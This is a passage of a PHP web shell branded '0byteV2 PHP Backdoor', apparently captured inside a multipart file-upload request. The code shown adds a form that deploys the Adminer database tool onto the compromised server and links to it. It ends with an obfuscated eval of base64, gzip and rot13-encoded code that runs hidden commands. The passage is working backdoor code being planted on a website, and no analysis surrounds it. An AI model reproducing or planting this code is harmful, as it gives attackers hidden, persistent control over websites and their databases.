method=post enctype=multipart/form-data>'; echo '<br><input name="mysql_int" type="submit" value="Call Adminer 4.3.1"><br>'; echo '</form>'; if($_POST['mysql_int'] == 'Call Adminer 4.3.1') { call_adminer($dwadminer, $fileadminer); $linkz = (isset($_SERVER['HTTPS']) ? "https" : "http") . "://$_SERVER[HTTP_HOST]"; if(file_exists('z-adminer.php')) { echo '<a href="'.$linkz.dirname($_SERVER['PHP_SELF']).'/'.$fileadminer.'" target="_blank">Adminer OK, Click Here!</a>'; } else { echo '<font color="red">[FAILED]</font>'; } } echo '</center>'; } echo '<div class="footer">'; echo "0byteV2 PHP Backdoor &copy; 2018 - "; eof(); echo '</div>'; echo '</div>'; eval(gzuncompress(base64_decode(str_rot13('rWlqHJSYjmND/FgUXI4Y2mdMVTkHC0wSbrOpc19dPIy7p5H2vJaXAfG/ogcBHCMAFZwqr7y7YmyKDDurHqqxCWsS0sVyJvM4g1bgLxk9BQhQRkGPZNFHNa24Ogjnb2dRnE/uQAmTqaD+KsH1QLYCi9Kf7wSrLse1P15TG89EiTYCl7xyaOyfvcYLTkzJFJSVzAdewJnnIZxm8ckK4DmNfsi0Kh/Sdzd+T70IMghfz5e0xE9yfteBW5AYCK6/RZR4dUwEUtgenJG2Oa3sAhIyGDBjvfFeiiCrXgwZxWpp3jwuSoDk8Mk0ymx3ipoDUOEAtFgISux3uEGOsewo7LLodngub0fFzpjcg/nkVeBIrIrBeDr02ASdO7MFoA0HMp4+TgVUY0UMRJ6GJdrcKo4/t5/E3p4sbwwO9ypjGqOHvtyr2KtNW2ECqACAcQe8i1ecDuwNr5k9N53ghVj=')))); ?>
------WebKitFormBoundary5SePZ93NyvO6nCmJ
Content-Disposition: form-data; name="g"

Upload Cok!
------WebKitFormBoundary5SePZ93NyvO6nCmJ--